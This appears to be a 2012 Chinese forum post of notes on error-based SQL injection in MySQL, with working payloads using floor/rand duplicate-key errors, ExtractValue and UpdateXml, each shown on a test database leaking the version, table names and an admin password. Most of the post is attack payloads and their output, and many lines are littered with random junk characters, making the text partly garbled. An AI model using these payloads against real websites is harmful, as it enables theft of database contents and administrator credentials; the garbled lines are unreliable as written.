放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。6 a' C% }+ b6 D" G! W3 M
实际测试环境:0 o! x2 ?" Y; M
: {, b6 f" b- `# Z
/ ~) g# B) k* {6 _mysql> show tables;" L6 ?. E/ `3 o9 o; Z' m1 H4 |
+----------------+3 i7 V4 X' K4 z; ?
| Tables_in_test |
+ ~# i. ^, f+ c8 E: J' Y+----------------+
! Z, }, a4 p/ X; b" S; K| admin |8 Z2 C9 C: [7 }7 z2 H' }6 O
| article |9 Y. i7 x" w, u* B
+----------------+
% b, K" C6 C6 u4 O0 @! D( p - d$ l& i" R# m' ~
+ `& t1 G( h. M' N' |0 T/ F
- N4 U0 \( ^* I* Cmysql> describe admin;$ c- J$ ?; w+ R6 Z" `5 H9 t: F4 P
+-------+------------------+------+-----+---------+----------------+/ J# a1 u+ F' j1 v7 v1 a) i
| Field | Type | Null | Key | Default | Extra |
4 z5 y* f" g$ W' n5 O3 K+-------+------------------+------+-----+---------+----------------+$ n8 ?3 v* z/ i
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
* l0 @! I3 d* u$ F$ d6 d) U| user | varchar(50) | NO | | NULL | |+ L' M0 { K; J8 o+ j2 J/ h
| pass | varchar(50) | NO | | NULL | |% O3 T ]( e/ u4 ~: h
+-------+------------------+------+-----+---------+----------------+1 P2 T( j% T0 d, H% Z
! y4 C0 o- O- L
5 f5 _# j4 ~5 ` {
7 ] y) l; `7 C I* imysql> describe article;. |: f: k$ V$ ?4 Y( N. m! Z0 N$ T$ t
+---------+------------------+------+-----+---------+----------------+
; \) d) j4 @: [- M/ r| Field | Type | Null | Key | Default | Extra |% u4 h1 P7 m0 B* Q5 `* l
+---------+------------------+------+-----+---------+----------------+& J C& B$ ?' g- v& }
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
2 u9 A B+ ]' m7 |+ T+ ~% w, ~| title | varchar(50) | NO | | NULL | |
6 S8 N, H; C _. ]! i4 l6 w| content | varchar(50) | NO | | NULL | |) d# W, g% D: t' ~
+---------+------------------+------+-----+---------+----------------+, Z9 m8 M- D4 o* ~, {4 j: t+ L
1、通过floor报错, ~' l4 W' ~/ y7 \2 [2 r2 s
可以通过如下一些利用代码
1 c1 g+ w# ~- |- e - Q. @( F Z8 W8 ~
" @1 R0 w* C( m3 e Pand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x9 R" K9 ?! o8 {/ Z: ~6 G& Y
from information_schema.tables group by x)a);
& `' Y3 m; e/ _& F4 Q. `8 d
8 e1 C V8 I$ ^ O4 Z
8 U9 n- w$ n1 i; a/ A! P& Fand (select count(*) from (select 1 union select null union select !1)x8 I/ u& b& F* j5 q& \
group by concat((select table_name from information_schema.tables limit 1),/ a2 D& ?4 C' x) D+ T/ ?& A
floor(rand(0)*2)));
$ {! [' j; }/ |5 m ~8 v举例如下:
) q& G G+ c/ B2 |首先进行正常查询:
6 g- ?( J2 x8 |9 g# T" a: V
- ^# C8 t* Z, p+ l+ omysql> select * from article where id = 1;
7 N& l, Q9 F4 s- W9 B8 v+----+-------+---------+
# n- _! O$ h; Z2 Z' q0 j3 i4 j| id | title | content |
. a% f! K. J! J/ i+----+-------+---------+
8 d2 L; {$ _' Q| 1 | test | do it |1 z( K5 G! w! _% |' U
+----+-------+---------+
' o* ~4 h h8 Y5 T( a假如id输入存在注入的话,可以通过如下语句进行报错。
% d( m" k; ?0 P1 I1 n! u9 \" M
; `# G1 `; }4 v " Y! t i3 w3 \- N6 ?1 l# M# L
mysql> select * from article where id = 1 and (select 1 from1 @% |; g: j. N; F, s6 x
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);" X# q% K5 x2 \/ a B
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'' {: k- ^- a3 _2 l
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
) ~+ x$ w0 D! o6 B6 A: e例如我们需要查询管理员用户名和密码:
) v+ N& G; i6 {, \Method1:
1 M, R' y# }4 n D& F6 ~
6 P# \3 y. u- h) s5 ~, @, c
( w1 [6 F6 P" @" k, n) qmysql> select * from article where id = 1 and (select 1 from( Y. U {3 h7 D2 v! v$ |+ i
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x* U0 u3 e9 p' @: w0 q. ^
from information_schema.tables group by x)a);
, T3 E' G+ I/ t! rERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'0 y3 x3 E8 s5 a+ A/ o3 Q
Method2:
; h5 B, j1 c" M" A- y8 p: W& n
4 m) N" x3 Y( D' \2 [5 I' @$ K
6 h8 q2 J% j( K& e4 @/ Pmysql> select * from article where id = 1 and (select count(*)
x; j# I' b- n* S$ Z" Yfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
1 P% c# f/ Z. o+ yfloor(rand(0)*2)));
# Q R/ g9 Y6 X6 `7 [; \ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
9 g: i1 ^% O' a2、ExtractValue! e% K6 J# e0 i1 F/ ?! h
测试语句如下
/ v. U# Z8 f8 n4 _5 g
C1 A" u' K' o" _1 C. ?
8 N# g5 d5 L4 W8 Jand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));6 u- h' d" @, c- Y; Z% x
实际测试过程, Z3 P/ d3 @+ y( Q! v1 L5 w; x# t
- e9 j* v& q9 p7 l6 x2 E& q
; s* W k1 c) q3 zmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
T7 y6 a" I/ n4 V* c; i(select pass from admin limit 1)));--
5 }3 Y9 j5 Y% `ERROR 1105 (HY000): XPATH syntax error: '\admin888'* B0 \* k" z6 X! A7 i' v' X
3、UpdateXml
i' W# D! {1 y8 o& V测试语句
5 B& A+ ~4 I9 A( W- h7 T' k
7 Z6 x5 W% i* R7 ~. R6 v5 @
* s$ a" d& A. W0 tand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
' C* k6 o( e, k2 w% \+ g W, k& |实际测试过程
) g: Y. ~ {/ I& _! B- k. g
- U5 p* `) J% W 2 m A; l2 p& W) e! S
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
: Y% }( r. v# l% e(select pass from admin limit 1),0x5e24),1));
0 `/ \* z5 t4 DERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
; q- {) c9 b* ?7 M* H/ Y5 ?All, thanks foreign guys.
$ A6 ?2 W2 N3 s. c- m
2 { W; j, ~, G& K9 {; k& p. T) w( b& Y; I
|
发表于 2012-12-10 10:28:51
收藏
支持
反对